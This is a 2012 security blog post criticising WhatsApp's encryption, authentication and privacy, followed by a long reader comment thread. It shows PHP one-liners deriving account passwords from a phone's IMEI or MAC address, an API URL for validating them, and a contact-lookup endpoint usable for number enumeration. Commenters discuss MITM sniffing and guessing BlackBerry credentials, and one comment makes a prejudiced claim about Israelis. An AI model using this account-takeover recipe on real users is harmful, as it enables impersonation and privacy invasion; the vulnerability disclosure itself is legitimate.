WhatsApp is broken, really broken

WhatsApp, the extremely popular instant messaging service for smartphones that delivers more than ~1billion messages per day has some serious security problems. I will try to give a detailed analysis on some of the issues.

Encryption

Until August 2012, messages sent through the WhatsApp service were not encrypted in any way, everything was sent in plaintext. When using WhatsApp in a public WiFi network, anybody was able to sniff incoming and outgoing messages (including file transfers). The company claims that the latest version of the software will encrypt messages – without giving any details on what cryptographic methods they are using (so it is safe to assume they did not do it the right way, using Public-key cryptography) . Update: their encryption is broken

However, the users mobile phone number is still being transferred in plaintext: WhatsApp still revealing users phone number after encryption update

Authentication

The authentication is a security nightmare. On Android, the password is a md5 hash of the reversed IMEI number:


$imei = "112222223333334"; // example IMEI
$androidWhatsAppPassword = md5(strrev($imei)); // reverse IMEI and calculate md5 hash

On iOS devices the password is generated from the devices WLAN MAC address:


$wlanMAC = "AA:BB:CC:DD:EE:FF"; // example WLAN MAC address
$iphoneWhatsAppPassword = md5($wlanMAC.$wlanMAC); // calculate md5 hash using the MAC address twice

The username is the users mobile phone number – an attacker would probably already know the number.

The IMEI can be obtained if you have physical access to the phone or if you control an app installed on the users device. The WLAN MAC address can be found using a network sniffer. Congratulations, you can now take over a users WhatsApp account¹. But how? Well, some people have done a excellent job reverse engineering the WhatsApp protocol. There is a working PHP class available that contains everything needed to build your own WhatsApp client: https://github.com/venomous0x/WhatsAPI

Got a smartphone with WhatsApp installed? Try it out yourself using the URLs known from the reverse engineered API!

https://r.whatsapp.net/v1/exist.php?cc=$countrycode&in=$phonenumber&udid=$password

$countrycode = the country calling code
$phonenumber = the users phone number (without the country calling code)
$password = see above, for iPhone use md5($wlanMAC.$wlanMAC), for Android use md5(strrev($imei)) / Note that the WhatsAPP UDID has nothing to with the Apple UDID - it is something completely different.

If you did everything right, the server will answer with a XML:

<?xml version="1.0" encoding="UTF-8"?>
<exist>
<response status="ok" result="xxxxxxxxxxx"/>
</exist>

Privacy

When WhatsApp starts it will send all numbers from your phones address book to the WhatsApp servers and check which numbers are registered with WhatsApp.

This is done like this:

https://sro.whatsapp.net/client/iphone/iq.php?cd=1&cc=$countrycode&me=$yournumber&u[]=$friend1&u[]=$friend2&u[]=$friend3&u[]=$friend4

$countrycode =  the country calling code
$yournumber = while this SHOULD be your number, it is not required, the API will accept any number 
$friendX = phone number (without the country calling code) from the address book that will be checked, u[] is an array so it is possible to check multiple numbers with one request

The server will answer with a XML document showing all numbers (hits) that were registered with WhatsApp, this will look something like this:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
    <dict>
        <key>P</key>
        <string>1234567890</string>
        <key>T</key>
        <integer>10817</integer>
        <key>S</key>
        <string>Some Status Message</string>
        <key>JID</key>
        <string>23xxxxxxxxx</string>
        <key>NP</key>
        <true/>
    </dict>
</array>
</plist>

Key “P” is the users phone number, Key “T” seems to be the uptime(?), Key “S” is the users status message. Not sure about “JID” (Update: JID ist the JabberID, thanks) and “NP” yet – if you have smart guess let me know. All this information is public.

Local database encryption

Since this requires physical access to the device or a full backup (in both cases you are screwed anyway) this is less interesting but still worth a note. In most cases it is possible to obtain the WhatsApp message history from an encrypted device or backup, for details read this paper: WhatsApp Database Encryption Project Report

Conclusion

 Do not use WhatsApp. Really, dont.

¹ Actually, you can’t – it’s against the law. That being said: i did not hijack anybody’s WhatsApp account during this research and neither should you. This information is for educational purposes only.

  • http://shareme.github.com Fred Grott

    I had the opportunity to interview with these clowns for an android dev role several moons ago..needless to say I gave up after they refused to listen to the above concerns..

    Your concerns have been known for awhile

  • Kiran

    The JID is the jabber ID (country code+mobile number)
    Not sure about the NP though.

  • http://github.com/eclipxe Chris

    JID is probably Jabber ID used for their xmpp server

  • ija

    We should all start using our regular XMPP accounts now! Most of us already have one. If you have a Gmail, Fastmail, Lavabit, GMX, Ovi.com, Yandex email address, you are ready to go. All that’s left to do: Install Xabber or IM+ or sth. alike on your smartphone!

    If you also want to instant message on your laptop: The latest Thunderbird comes with XMPP support! Or give Jitsi or one of the many alternatives a try! Enjoy!

    • http://adl.sdf.org ADL Walrus

      Really? Are there any mature, non-Java, cross-platform replacements for Jitsi that provide OTR encryption for Jingle audio and video chatting?

      If so, I’d really like to hear about them.

      • AnonCoward

        Pidgin.

      • http://jit.si Anonymous

        Wow, a Java hater never misses the opportunity to rant against his target.

        M

    • log

      Google Talk is so good!

      Whats App is only fast, but now that I know these issues, tchau (bye) …

    • Ramazan

      IM+ is not secure either :). A few months ago, I checked up the packets of IM+ using wireshark, and observed that all your packets are going over a third party server (probably owned by these IM+ guys). I mean, the xmpp packets go to a server, that is not the one that your jabber account resides… Seems like MitM…

  • Pingback: Whatsapp for webos - Page 17 - webOS Nation Forums()

  • Pingback: How to Hack WhatsApp Messenger | Build WhatsApp API Client()

  • Government enemy

    Great article!

    I will continue using WhatsApp though (at least until my iPhone 5 arrives) since there’s currently no alternative with the same amount of users..

    • S

      You are the government’s friend if you only correspond on unencrypted channels. Not a bad thing to be the government’s friend I guess, but definitely not their enemy.

    • Douglas Mak

      Try “Line”. It’s pretty nice! I think it’s even more well polished.

    • http://sieveandsand.com rogermugs

      have you considered wechat?

    • nightwash

      I have a SMS flat rate with my provider…..so this is an alternative…

    • elena

      Try XMS. They also have web version.

  • http://whalesalad.com Michael Whalen

    These guys maybe “clowns” and their infrastructure might have some pretty interesting security holes… but they have a shit ton of investment money and even more users. They’re doing something right.

    • shamank

      yes, money

    • BlackPiano

      I can agree!

      • http://www.FaisalAbid.com Faisal Abid

        Having a “shit ton” of investment money doesn’t guarantee a successful future. They keep this shit up and soon they’ll be “pivoting”.. and we all know what that means.

    • Fredrik Wendt

      Really? Yes, I agree that they’ve successfully scammed investors off their money, but otherwise … Nah.

      • http://treepie.sf.net marco b.

        The huge success is due to the ability to easily connect with your friend via the cellphone numbers already inside your phone.

        It really give a ton of useful functions with zero effort from the user, so the security is even more a problem.

        I hope they will fix the issue. Meanwhile I use a proxy with a on the fly replace of my number with a bait one just to test.

        peace&love

  • CepiPerez

    So what?
    Oh wait! I was talking to a friend about drugs! Maybe someone is sniffing my conversation!

    • Shant

      You understand that someone can hijak your account _forever_? (except if you buy a new phone to generate a new password)

      • CepiPerez

        Yes I understand this. But what will this person do with my account? What’s the point of doing that?

        • http://lucb1e.com lucb1e

          You’ll know it when it happened.

        • lomifeh

          The same thing they do with a cloned cell phone. Use it for illegal purposes while pinning it on someone else if tracked.

      • Anonymous

        You need a phone number and UDID before you can get to that point.

        • Sam

          UDID is the a md5 hash of 2x WLAN Mac and the phone number is being transfered without encryption. There you have everything you got.

          The WhatsAPP UDID ist not to be confused with the Apple UDID.

        • CepiPerez

          Ok then everyone can sniff my account right?
          Even if I use my 3g connection or my home network?

          • Shant

            If you stay on 3G and home-WiFi (obviously your home-WiFi needs to be encrypted) then you should be safe for now.

          • Ahtt

            Do you think people don’t use their mobile using a public wifi? :O

  • Kupsztal

    The super annoying thing is that their most recent update broke the app on iPhone 4s, and they not only seem not to be aware of the problem, but also they’re seem to ignore any messages, twitts, or iTunes comments. Unless they’re going through an acquisition and couldn’t be bothered with users at the moment ;)

  • n00badmin

    It is very important for users to be made aware of this vulnerability, however the reality is, if you avoid public wifi networks it is very unlikely someone could be in a position to sniff your traffic. (not impossible, but unlikely over cell carrier network or on encrypted home access point)

    It has been well documented that whatsapp sends unencrypted traffic yet the reality is they have likely decided the chances of this happening are very small, assuming the encryption of wireless carriers would suffice.

  • Mike

    Anyone took a look on what they use on the Windows Phone?

  • Travis

    Can someone suggest a feature-equivalent application that works on Android?

    • Jeremy

      KakaoTalk, same as whatsapp plus there’s free calling too.

    • Murtaza

      There are many. eBuddy XMS, for instance.

    • Anonymous

      Try moped.com, need a Twitter account tho

    • Anonymous

      talk.to is good

    • ykombinator

      and then there’s NimBuzz too.

    • Anonymous

      ICQ
      (no it’s not a joke, it’s actually a feature-rich Google Talk and Facebook chat client)

      • YzeOne

        I there a reason why everyone is avoiding Viber as an option nere ?

        • Anonymous

          Viber is Israeli. You can bet the Israelis are spying on every single Viber user on earth. Never ever trust an Israeli with anything. Ever.

    • Anonymous

      do not use kakaotalk, cuz its privacy policies are dangerous for security. there was phishing in korea, and almost of the users are annoying of ‘featured friend’ function.

  • Pooja

    i tried hike and i love it. It got all the nice features like group chat,filetransfer and in addition free sms(to India). And it doesnt have any such security issues and respond to their user’s concerns so promptly. but unfortunately its only supports India as of now.

  • zhu

    I think anyone who are communicating information using IM will be using a blackberry. Most people using whatsapp are probably not that concerned with security. But still, it is a big issue that needs to be resolved.

    • zhu

      Sorry I mean anyone who really wants to have secure IM communication via their mobile

  • Pingback: WhatsApp still sends phone numbers in Plain Text. Encryption is not complete.()

  • Robin

    I have done some research on my own. Mostly looking at the mediasharing function. The images you send are hosted on a public website, you just have to find the URL.

    If someone intercepts your message, he will have that URL, same goes for someone having access to your message database. Even when you’ve deleted the file from your phone.

    For example: I just sent this picture to my girlfriend while sniffing my WIFI. Result is an URL looking like this: https://mms504.whatsapp.net/d6/15/00/6/1/6169eeec03dc50f69456497508a9466c.jpg

    Now what I have found out is that the URL isn’t completely random. In fact, nothing is (with the exception of two unknown values).
    If you’d break it down it comes to this:
    http://mmsservernumber, usually 300,400 or 500].whatsapp.net/[d0-d11 no idea what this is]/[day of upload 00]/[hour of upload 00 pst]/[hash first letter]/[hash second letter]/[hash].jpg

    Anyone any idea on what the D stands for? And what the hash is made of?

    • Alex

      Maybe the D is the month, since it’s 0-11. in your case it’s 6, and you said that you just sent the picture, so I’ll assume that means September. September is the 9th month, and adjusting for 0 style counting that makes it number 8.

      however, just because it isn’t the right number doesn’t necessarily mean it isn’t the month. Maybe they assigned some random order to the months for “Added Security”, which seems like something they would do.

      • Robin

        Thing is: it changes per message. Also I think the way it is setup right now is using day and hour folders, so an image never exists for longer than a month, and they just replace images in a new month. Making server cleanup unnecessary.

        • indrora

          > Doesn’t require server cleanup

          No, it does since this looks to be an MD5 hash (they seem to be fond of those) and thus is unique (to some degree) and unless they’ve done something stupid and said

          $hash = md5($to.$from.date(“%M%D”.time());

          it is highly unlikely that there will be a collision between two messages (and here, you would have to send a lot of photos for them to be inaccessible).

          More than likely, they’ve said

          $hash = md5($to.$from.time().md5_file($file_uploaded));

          which would require you to send the same picture to the same person from the same account at the exact (within 1s) same time.

          • Robin

            Oh yeah you’re right.

            One thing I did notice though is that if you’d upload the same image twice, you get the same URL! Even with some time in between uploads.

          • Robin

            And even when sending it to others.

    • log

      o_0

      Holly crap!

    • ven000m

      How did you sniffed the URL, where Whatsapp saves that picture?

      • Robin

        In this case I just looked it up in the sqldatabase in data/data/apps. However you can sniff it using wireshark and a mitm attack.

        • ven000m

          Thanks for your reply!

          I tried it with wireshark, but it looks like that its now encrypted. I cant fetch the URL with Wireshark. I just see the host -> http://mms05.whatsapp.net/ .. but not the full link. Any tutorial up how to decrypt the things?

  • Zulu

    What about Viber – care to investigate that one?

    • du

      Yuilop looks good, as a Whatsap replacement

  • Pingback: WhatsApp security : frankjordans.com()

  • http://www.cubie.com Cubie User

    You can use Cubie Messenger, which has been verified to have air-tight security. It originated from Asia, but has an English version.

  • Manuel

    If you are concerned about your privacy, just don’t use What’s App throught public WiFi networks and don’t share top secret information, this way maybe you will be safe. You also have to consider that WA is a publicity less FREE product that has some security issues you have to deal with.

  • Pingback: Wie Jugendliche WhatsApp nutzen | Schule und Social Media()

  • http://www.twitter.com/yousefed YousefED

    The Windows Phone 7 client is also completely insecure (the global device id is the password). I was able to create a WP7 app that sends and receives whatsapp messages on the user’s behalf in one evening (it only needs the phone number, which an app cannot directly get from the WP7 SDK).

    However, this means ANY app on a WP7 device only needs to prompt for a user’s phone number and can communicate with WhatsApp on the user’s behalf.

  • log

    Very good post, thank you!

  • Forever

    You cannot hack the account forever.
    In the super rare case that someone would actually be able to apply this in real life, which is very rare and this article really *really* over exaggerates: don’t be afraid users ;), you can always login on another device which then locks in to a new password which is unknown to the malicious user.

    Seriously, while the security is not optimal due to the simplicity for the users, it is not so highly insecure due to the hidden away accs. Basically: the chance of this happening to you is 1 in 250 million.. And that’s even a chance!
    Stop spreading so much nonsense baseless fear ;)

    • Charles

      The real problem is not the WiFi sniffing, but the app databases with IMEI numbers and phone numbers.

    • Y110

      Oh yes i can always login from another smartphone!
      But that means that if someone hackin your WathsApp account you have to buy a NEW phone!
      Absolutely nonsense baseless fear…

  • n00badmin

    whatsapp update pushed today advising encryption now avail over wifi… ill run a trace, let you know!

  • Kyhwana

    Wait, isn’t it sending everything via HTTPS? Does it do cert checking?
    (Thinking of intercepting it via wifi against android users)

  • http://www.jakobcarstens.de Jakob

    Will Osama bin Ladin kill me because he saw my WhatsApp msg to my girlfriend when I wrote her I’m love with her? No.

    People could hear me talkin in the subway – I don’t care at all. Since I am not Jason Bourne everything is cool.

  • Pingback: Massive Sicherheitslücken in WhatsApp | Juergen Kraemer – NETZWELT()

  • Pingback: Whatsapp security issues. | Information Strategy()

  • Pingback: Drecks WhatsApp! | dreitehabee()

  • zbuk

    The sad thing is when someone hijacks your account there’s nothing to do, the hijacker can start impersonating you etc., even if you don’t use Whatsapp, your friends will just think you started using it like everyone else…

  • http://www.indiandragon.in indiandragon

    Guys, Guardian project makes gibber bot just for this purpose. No iPhone support though, but it is the best OTR bases client for Android so far.

  • Pingback: Neue Sicherheitslücken: WhatsApp gehört gelöscht | Die Sendung mit dem Internet()

  • Pingback: WhatsHacked, WhatsCracked, WhatsSucks? WhatsApp « Subversive Bytes()

  • Pingback: Using WhatsApp is a huge security risk | Doobybrain.com()

  • FF

    NP = not paying?
    ….. or perhaps null problemo

    • fileperms

      well played sir

    • dexymx

      I have just a very very little dataset (around 4 friends xD), but in this case NP = Android. Anybody out there to disprove that?

  • User773

    Hey,
    is anybody out there who has taken a closer look to WhatsAPI?
    What steps do you’ve taken to work with it? Thank you :)

  • Guest

    It is a simple messaging service. You guys do not work for the CIA, KGB, mosad or any similar organization. The greatest risk involved here is the fact that somebody could get to see what you say to your girlfriend.
    Get over it. There is nothing major at risk. No lives will be put in danger and no money will be lost. WhatsApp is great application. Period.

    • Pyrocolada

      You clearly have no clue how identity fraud works: The info leaked by WhatsApp can be used to get your OTP for your bank account. We’ll see what happens when you complain to the bank that your money is missing, and they say: “Sorry, you made a huge transfer, not our problem.”

  • Pingback: WhatsApp – schlecht verschlüsselt › andronews.de()

  • cityhunt

    NP, in most cases, in coding stands for “Not Provided”, and it’s used as a placeholder/anchor point. Good article btw :)
    UDIDs are not possibly unknown to App sellers/coders, and all this stuff you can sniff with ethereal and tools like that is stored on THEIR server also. Can one of the critics above imagine what this could means? :)

  • Arturo Torres Sánchez

    Do you know how the Blackberry password is generated? I tried with MAC address and got nothing. I was going to use IMEI, but since my phone is CDMA, I’ve got MEID. I tried it too and it didn’t work.

    • fileperms

      Did you try exactly the methods that i posted? Using md5(WLANMAC.WLANMAC) or md5(strrev(IMEI))? I don’t own a Blackberry so i didn’t have the chance to test this yet… if you need help with the md5 stuff please email me: admin@fileperms.org

      • Arturo Torres Sánchez

        I tried md5(WLANMAC.WLANMAC), and md5(rev(MEID)) (which is different from IMEI, I don’t have this). None of them worked. I also tried with Blackberry’s PIN.

        • fileperms

          The BB PIN would have been my next guess, maybe it’s md5(PIN.PIN) or md5(strrev(PIN) – but that’s just guessing. If i get my handy on a BB device i will do some testing.

          • Arturo Torres Sánchez

            Hm, I’ve just noticed. I tried hex MEID, but not dec MEID. I will try again.

  • http://www.kilaswacana.com Obhert

    its simle to me, Just Back to SMS : LoL ;-)

  • Max

    try chatON, i dont know but maybe its taking security more serious :) might be better!

  • Pingback: Whatsapp Sicherheitslücken: Wieder mal Negativschlagzeilen - Whatsapp, Sicherheitslücke, Whatsapp Hacker - 24mobile Handy Blog für Handys und Handyverträge()

  • http://krishnamurthyinfo.com/ kminfo

    whats app works without any bugs in android platform and in the means of processor itz perform amazingly over the 1ghz and the version of androids above 2.2 to till the new one android jelly bean

  • dexymx

    Hello,

    do you know where user pictures are saved? Not the one which are send, but profile pictures. :)

  • Pingback: Lächerlich: “WhatsApp” unsicher wie ein offenes Scheunentor – Nutzung nicht zu empfehlen | iPhone-Ticker()

  • Pingback: #385 iPhone 5 Adventures, Audio Compression, Getting the Most Out of Finder « Nosillacast()

  • potato

    NP seems to indicate whether the user is using iPhone or Android.
    iPhone clients will not have the NP flag, while Android clients will have NP flag set to true.
    I have no idea what will happen to users using Nokia/Blackberry. I don’t have any whatsapp friend using one of those phones :P

  • Andreas

    Hi there
    Can anybody help me to find the WhatsAPI from venomous? I can’t find it online. Maybe someone of you can send me the file or the link for downloading it?

    Thanks a lot!

  • Pingback: How Not to Design an Instant Messenger « kabelmast()

  • Pingback: BBM vs WhatsApp - BlackBerry Forums at CrackBerry.com()

  • Elspeth Chagall

    You got to love Wireshark.

    But this is scary stuff. If it’s this easy to be able to get to someone’s personal mobile phone info, what’s the point. :( I love Whatsapp but this is very frightening news.

  • Coma

    Any news regarding this issue? The Android app has received several updates since this post, the latest of which (version 2.8.7326) is supposed to include a ”critical bug fix for connection issues”.

  • mywebslam

    the authentification from whatsapp has changed a few days ago, so the authetification with these settings (md5 hash) doesnt work anymore…

    example:
    https://r.whatsapp.net/v1/exist.php?cc=43&in=66666666666&udid=3e7e75f9a30b62c0958b7ef249e1b0b0

    response:

    so is whatsapp now more save?? or is this already hacked?
    if then, how?

  • enought with whatsupp

    Guys, my whatsupp account being hacked today.I never use wifi,only 3g& I got the latest version of it.So I just simply uninstall it&WILL NEVER USE IT AGAIN. It’s hurt when someone pretend to be u & saying something stupid in all of ur wtfgrups.When u go through it then u know it.

  • Harshal

    Is it possible to use whatsapp on 2 device that run android simultaneously?
    i tried the backup restore method over the net but issue i get msg on either of the device not both.. Is is possible to get msg on both the devices??

  • Pingback: Anonymous()

  • Pingback: WhatsApp and Facebook. Is there a future? | Horacio Reyes'()

  • http://www.masoudbnd.blogfa.com masoud

    I wanted to see a specific site uptime sent to Whatsapp

  • RONZ

    Hi!
    Does anyone outhere know why does the What’s app icon appear twice on galaxy S2, everytime it is downloaded? Could my what’s app get hijacked by simply entering my phone number and having my SIM (from behind my back of course) to receive the security code on it then enter it, and start receiving my messages on the hijacker’s mobile?

  • Pingback: Why Whatsapp is boon and bane at the same time | en.code-bude.net()

  • http://none tommy

    Hi, all

    I tried to use the following url just for fun:
    https://r.whatsapp.net/v1/exist.php?…
    https://r.whatsapp.net/v1/exist.php?cc=$countrycode&in=$phonenumber&udid=$password

    it seems doesn’t function!!!

    So, analyzing the traffic with wireshark, i see the first packet sent to the server from the client that is divided in two parts, the first (FIXED) containt the model of the phone and the telephone number, the second is a “VARIABLE” part that maybe work for the encryption of the session.

    What i have seen is that this second part (variable), change every time a new session from the client to the server START.

    Any idea about the encryption?

    THANKS ALL.

  • Pingback: Whatsapp is broken, really broken | the dirk()

  • Dynasty

    What exactly does it mean that people can take over your account??? Can they have access to your message history? Can they see everything you write and receive after they’ve taken over your account? Can they see all your contacts and their phone numbers?

    I first installed Whatsapp on my Android, and then when I bought a new Smart phone and installed it there. It then, automatically disconnected me from the old phone – so you can’t use the app on two devices at the same time with the same account – so how exactly does the ”hacker” get my private information if s/he doesn’t log in with my account first? Wouldn’t I immediately know if someone else logged inn to my account? Or do they use another program?

    I also read on their support website that they do not recommend people installing whatsapp on different devices with the same phone number or exchanging it between multiple devices because it will eventually block your number from using whatsapp. Is that true?

    Appreciate fast reply – thank you :)))
    Great article! But, unfortunately – articles like these are more unsafe than the app itself… It’s one thing to make someone aware of something bad and a whole other to ”teach” something how to do bad… just saying..

    • fileperms

      Hello there. First: please not this article was written back in September 2012, the WhatsApp Team has fixed some of the flaws that are described here. Although an attacker can not access the message history, he can send and receive message using the hijacked account.

  • http://konvict.googlecode.com KiDo

    Hello , I don’t use whatsapp so I know nothing about it
    But my friend told me that someone added her on whatsapp , and he could hack ALL her phone files , like pictures , messages history …etc
    Even he sent her the pictures as a proof
    SO , , , Is there such thing??? like hacking others phones using whatsapp???
    Is it really possible to be done?

  • Asad

    Hello,

    I am going nuts from past one week as my whatsapp account is returning following error and not allowing to use the application at all:
    “Your phone no …………. Is not allowed to use our service”

    It happened all of the sudden when I was sending broadcast message to all my contacts. A screen appear requesting to verify the phone no and after Adding the phone no it returns above error.

    Have been writing whatsapp support constantly but no response from their end.

    Pls can some one help making my whatsapp work on same phone no.

    Thanks in advance!

    Asad

    • Anonymous

      the same problem exist with me…. don’t know what to do…… can any body help……

  • asad

    Hello All,

    can any one guide me how can i solve the following error of whatsapp on my BB9900 as it says my phone number is blocked or something.
    How can i unblock my number and use the whatsapp ?

    Error: Your phone number +xxxxxxxxxx is no longer allowed to use our service.

    i have already wrote to whatsapp support many times but no response even after a week is passed..

    Pls assist

  • Tshepi

    Hello

    Last year November my phone couldn’t send or receive whattsapp messages for about a week it says error. I couldn’t even go in to whattsapp and now 3 people who are my contacts received a strange messages and they all think I send it. I am 100% sure I didn’t send it.
    Do you think my phone was hacked?
    How do I proof to everybody that I didn’t send that message? I am desperate to proof my innocence.

  • Pingback: Krönika: Därför borde du sluta använda WhatsApp | Ajour()

  • Pingback: Threema statt WhatsApp | Jonas Schönfelder()

  • Pingback: Securing VoIP in the Presence of Pervasive Monitoring « Hannes Tschofenig()

  • Pingback: Whatsapp Privacy Snafu - BlackBerry Forums Support Community()

  • Pingback: WhatsApp is broken, really broken | fileperms | senk9@wp()

  • Pingback: Sinnloser Hype: Threema. | laclaro()

  • Pingback: Facebook shares your data but what about WhatsApp? Do you still want to use it? | HackRead – Latest Cyber Crime – Information Security – Hacking News()